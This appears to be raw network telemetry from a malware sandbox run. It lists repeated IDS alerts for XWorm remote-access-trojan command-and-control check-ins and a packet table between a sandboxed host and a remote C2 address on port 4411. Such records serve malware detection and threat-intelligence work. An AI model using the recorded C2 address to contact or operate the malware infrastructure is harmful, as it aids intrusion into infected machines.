                                2024-12-18T08:17:02.694848+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:02.745951+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:03.333935+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:03.336704+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:04.482711+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:04.485525+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:04.673767+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:04.677904+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:04.987325+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:05.038138+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:05.448644+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:05.739584+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:05.740809+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:05.907966+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:05.959867+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:06.051606+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:06.079475+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:06.242553+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:06.253886+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:49.842292+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:49.889402+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:50.033438+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:50.153355+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:50.153495+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:50.319790+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:50.436716+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:50.464309+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:50.511018+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:50.511138+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:50.596929+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:50.849597+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:50.853991+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:52.014208+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:52.015176+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:52.141800+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:52.325980+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:52.420644+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:52.624952+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:52.660907+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:52.971915+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:53.042473+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:53.046102+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:53.133993+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:53.277222+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:53.279175+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:53.444801+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:53.445717+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:54.639300+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:54.641289+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:55.248426+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:55.311781+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:55.625013+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:55.684996+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:55.913635+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:55.924147+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:56.104662+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:56.234945+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:56.283098+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:56.335800+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:56.404695+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:56.570069+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:56.604705+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:56.717128+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:56.950326+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:57.998586+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:57.999588+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:58.237203+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:58.239592+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:58.429825+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:58.663864+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:58.664836+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:59.260084+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:59.262856+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:59.549193+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:59.967979+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:18:00.013906+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:18:00.158963+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:18:00.324751+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:18:00.350050+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:18:05.990968+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                Dec 18, 2024 08:16:41.913671017 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:41.938129902 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:41.939615965 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:42.101320028 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.101381063 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:42.222027063 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.223191977 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:42.275763035 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.342668056 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.342736959 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:42.413501024 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.462851048 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.462929964 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:42.584371090 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.604480028 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.629843950 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:42.773736954 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.795679092 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.797982931 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:42.817853928 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:42.981204033 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.981352091 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:43.100883007 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:43.440444946 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:43.559945107 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:43.560015917 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:43.679569006 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:43.679646015 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:43.799226999 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:43.799295902 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:43.873445034 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:43.873539925 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:43.918833017 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:43.918894053 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:43.993103981 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:43.993163109 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:44.038369894 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.064574003 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.157206059 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.157274961 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:44.187114000 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.252326012 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:44.255537033 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.255623102 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:44.276803970 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.276930094 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:44.375058889 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.375453949 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.437268972 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.437408924 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:44.556850910 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.566317081 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.571175098 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:44.733161926 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.733309031 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:44.748033047 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.852775097 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.852922916 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:44.972660065 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:46.158982038 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:46.278482914 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:46.591890097 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:46.593476057 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:46.712925911 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:47.065386057 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:47.185143948 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:47.498676062 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:47.500355005 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:47.619965076 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:47.620035887 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:47.740937948 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:47.753313065 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:47.872833967 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:47.872893095 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:47.992470980 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:48.049624920 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:48.112015963 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:48.169202089 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:48.169266939 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:48.289398909 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:48.303349972 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:48.305445910 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:48.360229969 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:48.439868927 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:48.469264030 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:48.474790096 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:48.493884087 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:48.549206972 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:48.594330072 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:48.595876932 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:48.715362072 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:49.237050056 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:49.356612921 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:49.356658936 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:49.476739883 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:49.476803064 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:49.596296072 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:49.596402884 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:49.669826984 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:49.715955973 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:49.716013908 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:49.835597992 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:49.835649014 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:49.860846043 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:49.997245073 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:49.997342110 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:50.026813030 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.051920891 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.051995039 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:50.116897106 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.117012024 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:50.171597958 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.237025976 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.325196981 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.327274084 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:50.446924925 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.516103029 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.521845102 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:50.638150930 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.641364098 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.641544104 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:50.761132002 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.761244059 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:50.829185009 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.880808115 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.881934881 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:51.001571894 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:51.119723082 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:51.121850967 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:51.241314888 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:51.241379023 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:51.360879898 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:51.393368006 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:51.512957096 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:51.513011932 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:51.632519007 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:51.632575035 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:51.752322912 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:51.752379894 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:51.761497974 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:51.846082926 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:51.913661003 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:51.913726091 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:51.944454908 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.033220053 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.033356905 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:52.063076019 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.134540081 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.134608030 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:52.193245888 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.193422079 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:52.254075050 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.254235029 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.313256025 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.313467979 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:52.433336020 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.445895910 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.448688984 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:52.504580021 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.549858093 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:52.609426975 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.609713078 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:52.624346018 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.729275942 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.729516029 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:52.759401083 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.849859953 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.049230099 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.137454033 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.137496948 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.137643099 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.168926954 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.169296980 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.257293940 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.288781881 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.288830996 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.408265114 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.612123013 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.731662989 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.731753111 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.835046053 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.835103989 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.851231098 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.851285934 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.954683065 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.954755068 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.970736027 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.970792055 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.049025059 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.049240112 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.074278116 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.074534893 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.090270996 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.168993950 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.169050932 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.194015026 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.265642881 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.288650990 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.288794041 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.360678911 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.409127951 CET44114970892.255.57.155192.168.2.8
